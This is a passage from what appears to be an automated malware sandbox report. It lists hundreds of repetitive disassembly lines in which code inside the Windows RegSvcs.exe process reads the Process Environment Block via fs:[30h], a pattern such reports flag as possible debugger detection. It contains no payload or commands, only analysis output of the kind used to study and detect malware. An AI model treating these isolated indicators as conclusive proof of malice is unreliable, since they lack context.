            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01613B7A mov eax, dword ptr fs:[00000030h]6_2_01613B7A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EDB40 mov eax, dword ptr fs:[00000030h]6_2_015EDB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8B58 mov eax, dword ptr fs:[00000030h]6_2_016B8B58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EDB60 mov ecx, dword ptr fs:[00000030h]6_2_015EDB60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A131B mov eax, dword ptr fs:[00000030h]6_2_016A131B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016103E2 mov eax, dword ptr fs:[00000030h]6_2_016103E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016103E2 mov eax, dword ptr fs:[00000030h]6_2_016103E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016103E2 mov eax, dword ptr fs:[00000030h]6_2_016103E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016103E2 mov eax, dword ptr fs:[00000030h]6_2_016103E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016103E2 mov eax, dword ptr fs:[00000030h]6_2_016103E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016103E2 mov eax, dword ptr fs:[00000030h]6_2_016103E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160DBE9 mov eax, dword ptr fs:[00000030h]6_2_0160DBE9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016653CA mov eax, dword ptr fs:[00000030h]6_2_016653CA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016653CA mov eax, dword ptr fs:[00000030h]6_2_016653CA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01614BAD mov eax, dword ptr fs:[00000030h]6_2_01614BAD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01614BAD mov eax, dword ptr fs:[00000030h]6_2_01614BAD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01614BAD mov eax, dword ptr fs:[00000030h]6_2_01614BAD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B5BA5 mov eax, dword ptr fs:[00000030h]6_2_016B5BA5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F1B8F mov eax, dword ptr fs:[00000030h]6_2_015F1B8F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F1B8F mov eax, dword ptr fs:[00000030h]6_2_015F1B8F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A138A mov eax, dword ptr fs:[00000030h]6_2_016A138A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0169D380 mov ecx, dword ptr fs:[00000030h]6_2_0169D380
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161B390 mov eax, dword ptr fs:[00000030h]6_2_0161B390
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612397 mov eax, dword ptr fs:[00000030h]6_2_01612397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0169B260 mov eax, dword ptr fs:[00000030h]6_2_0169B260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0169B260 mov eax, dword ptr fs:[00000030h]6_2_0169B260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8A62 mov eax, dword ptr fs:[00000030h]6_2_016B8A62
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0162927A mov eax, dword ptr fs:[00000030h]6_2_0162927A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E9240 mov eax, dword ptr fs:[00000030h]6_2_015E9240
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E9240 mov eax, dword ptr fs:[00000030h]6_2_015E9240
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E9240 mov eax, dword ptr fs:[00000030h]6_2_015E9240
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E9240 mov eax, dword ptr fs:[00000030h]6_2_015E9240
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01674257 mov eax, dword ptr fs:[00000030h]6_2_01674257
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EAA16 mov eax, dword ptr fs:[00000030h]6_2_015EAA16
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EAA16 mov eax, dword ptr fs:[00000030h]6_2_015EAA16
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01624A2C mov eax, dword ptr fs:[00000030h]6_2_01624A2C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01624A2C mov eax, dword ptr fs:[00000030h]6_2_01624A2C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E5210 mov eax, dword ptr fs:[00000030h]6_2_015E5210
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E5210 mov ecx, dword ptr fs:[00000030h]6_2_015E5210
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E5210 mov eax, dword ptr fs:[00000030h]6_2_015E5210
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E5210 mov eax, dword ptr fs:[00000030h]6_2_015E5210
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F8A0A mov eax, dword ptr fs:[00000030h]6_2_015F8A0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01603A1C mov eax, dword ptr fs:[00000030h]6_2_01603A1C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612AE4 mov eax, dword ptr fs:[00000030h]6_2_01612AE4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612ACB mov eax, dword ptr fs:[00000030h]6_2_01612ACB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161FAB0 mov eax, dword ptr fs:[00000030h]6_2_0161FAB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FAAB0 mov eax, dword ptr fs:[00000030h]6_2_015FAAB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FAAB0 mov eax, dword ptr fs:[00000030h]6_2_015FAAB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161D294 mov eax, dword ptr fs:[00000030h]6_2_0161D294
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161D294 mov eax, dword ptr fs:[00000030h]6_2_0161D294
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E52A5 mov eax, dword ptr fs:[00000030h]6_2_015E52A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E52A5 mov eax, dword ptr fs:[00000030h]6_2_015E52A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E52A5 mov eax, dword ptr fs:[00000030h]6_2_015E52A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E52A5 mov eax, dword ptr fs:[00000030h]6_2_015E52A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E52A5 mov eax, dword ptr fs:[00000030h]6_2_015E52A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160C577 mov eax, dword ptr fs:[00000030h]6_2_0160C577
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160C577 mov eax, dword ptr fs:[00000030h]6_2_0160C577
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01623D43 mov eax, dword ptr fs:[00000030h]6_2_01623D43
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01663540 mov eax, dword ptr fs:[00000030h]6_2_01663540
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01607D50 mov eax, dword ptr fs:[00000030h]6_2_01607D50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0166A537 mov eax, dword ptr fs:[00000030h]6_2_0166A537
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01614D3B mov eax, dword ptr fs:[00000030h]6_2_01614D3B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01614D3B mov eax, dword ptr fs:[00000030h]6_2_01614D3B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01614D3B mov eax, dword ptr fs:[00000030h]6_2_01614D3B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8D34 mov eax, dword ptr fs:[00000030h]6_2_016B8D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]6_2_015F3D34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EAD30 mov eax, dword ptr fs:[00000030h]6_2_015EAD30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01698DF1 mov eax, dword ptr fs:[00000030h]6_2_01698DF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov eax, dword ptr fs:[00000030h]6_2_01666DC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov eax, dword ptr fs:[00000030h]6_2_01666DC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov eax, dword ptr fs:[00000030h]6_2_01666DC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov ecx, dword ptr fs:[00000030h]6_2_01666DC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov eax, dword ptr fs:[00000030h]6_2_01666DC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov eax, dword ptr fs:[00000030h]6_2_01666DC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FD5E0 mov eax, dword ptr fs:[00000030h]6_2_015FD5E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FD5E0 mov eax, dword ptr fs:[00000030h]6_2_015FD5E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016135A1 mov eax, dword ptr fs:[00000030h]6_2_016135A1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B05AC mov eax, dword ptr fs:[00000030h]6_2_016B05AC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B05AC mov eax, dword ptr fs:[00000030h]6_2_016B05AC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E2D8A mov eax, dword ptr fs:[00000030h]6_2_015E2D8A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E2D8A mov eax, dword ptr fs:[00000030h]6_2_015E2D8A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E2D8A mov eax, dword ptr fs:[00000030h]6_2_015E2D8A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E2D8A mov eax, dword ptr fs:[00000030h]6_2_015E2D8A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E2D8A mov eax, dword ptr fs:[00000030h]6_2_015E2D8A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01611DB5 mov eax, dword ptr fs:[00000030h]6_2_01611DB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01611DB5 mov eax, dword ptr fs:[00000030h]6_2_01611DB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01611DB5 mov eax, dword ptr fs:[00000030h]6_2_01611DB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612581 mov eax, dword ptr fs:[00000030h]6_2_01612581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612581 mov eax, dword ptr fs:[00000030h]6_2_01612581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612581 mov eax, dword ptr fs:[00000030h]6_2_01612581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612581 mov eax, dword ptr fs:[00000030h]6_2_01612581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161FD9B mov eax, dword ptr fs:[00000030h]6_2_0161FD9B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161FD9B mov eax, dword ptr fs:[00000030h]6_2_0161FD9B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160746D mov eax, dword ptr fs:[00000030h]6_2_0160746D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A44B mov eax, dword ptr fs:[00000030h]6_2_0161A44B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167C450 mov eax, dword ptr fs:[00000030h]6_2_0167C450
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167C450 mov eax, dword ptr fs:[00000030h]6_2_0167C450
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161BC2C mov eax, dword ptr fs:[00000030h]6_2_0161BC2C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B740D mov eax, dword ptr fs:[00000030h]6_2_016B740D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B740D mov eax, dword ptr fs:[00000030h]6_2_016B740D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B740D mov eax, dword ptr fs:[00000030h]6_2_016B740D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]6_2_016A1C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666C0A mov eax, dword ptr fs:[00000030h]6_2_01666C0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666C0A mov eax, dword ptr fs:[00000030h]6_2_01666C0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666C0A mov eax, dword ptr fs:[00000030h]6_2_01666C0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666C0A mov eax, dword ptr fs:[00000030h]6_2_01666C0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A14FB mov eax, dword ptr fs:[00000030h]6_2_016A14FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666CF0 mov eax, dword ptr fs:[00000030h]6_2_01666CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666CF0 mov eax, dword ptr fs:[00000030h]6_2_01666CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666CF0 mov eax, dword ptr fs:[00000030h]6_2_01666CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8CD6 mov eax, dword ptr fs:[00000030h]6_2_016B8CD6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F849B mov eax, dword ptr fs:[00000030h]6_2_015F849B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8F6A mov eax, dword ptr fs:[00000030h]6_2_016B8F6A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FEF40 mov eax, dword ptr fs:[00000030h]6_2_015FEF40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FFF60 mov eax, dword ptr fs:[00000030h]6_2_015FFF60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161E730 mov eax, dword ptr fs:[00000030h]6_2_0161E730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B070D mov eax, dword ptr fs:[00000030h]6_2_016B070D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B070D mov eax, dword ptr fs:[00000030h]6_2_016B070D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A70E mov eax, dword ptr fs:[00000030h]6_2_0161A70E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A70E mov eax, dword ptr fs:[00000030h]6_2_0161A70E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E4F2E mov eax, dword ptr fs:[00000030h]6_2_015E4F2E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E4F2E mov eax, dword ptr fs:[00000030h]6_2_015E4F2E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160F716 mov eax, dword ptr fs:[00000030h]6_2_0160F716
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167FF10 mov eax, dword ptr fs:[00000030h]6_2_0167FF10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167FF10 mov eax, dword ptr fs:[00000030h]6_2_0167FF10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016237F5 mov eax, dword ptr fs:[00000030h]6_2_016237F5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F8794 mov eax, dword ptr fs:[00000030h]6_2_015F8794
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01667794 mov eax, dword ptr fs:[00000030h]6_2_01667794
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01667794 mov eax, dword ptr fs:[00000030h]6_2_01667794
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01667794 mov eax, dword ptr fs:[00000030h]6_2_01667794
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160AE73 mov eax, dword ptr fs:[00000030h]6_2_0160AE73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160AE73 mov eax, dword ptr fs:[00000030h]6_2_0160AE73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160AE73 mov eax, dword ptr fs:[00000030h]6_2_0160AE73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160AE73 mov eax, dword ptr fs:[00000030h]6_2_0160AE73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160AE73 mov eax, dword ptr fs:[00000030h]6_2_0160AE73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]6_2_015F7E41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]6_2_015F7E41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]6_2_015F7E41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]6_2_015F7E41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]6_2_015F7E41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]6_2_015F7E41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F766D mov eax, dword ptr fs:[00000030h]6_2_015F766D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0169FE3F mov eax, dword ptr fs:[00000030h]6_2_0169FE3F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EC600 mov eax, dword ptr fs:[00000030h]6_2_015EC600
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EC600 mov eax, dword ptr fs:[00000030h]6_2_015EC600
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EC600 mov eax, dword ptr fs:[00000030h]6_2_015EC600
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01618E00 mov eax, dword ptr fs:[00000030h]6_2_01618E00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1608 mov eax, dword ptr fs:[00000030h]6_2_016A1608
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A61C mov eax, dword ptr fs:[00000030h]6_2_0161A61C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A61C mov eax, dword ptr fs:[00000030h]6_2_0161A61C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EE620 mov eax, dword ptr fs:[00000030h]6_2_015EE620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016116E0 mov ecx, dword ptr fs:[00000030h]6_2_016116E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01628EC7 mov eax, dword ptr fs:[00000030h]6_2_01628EC7
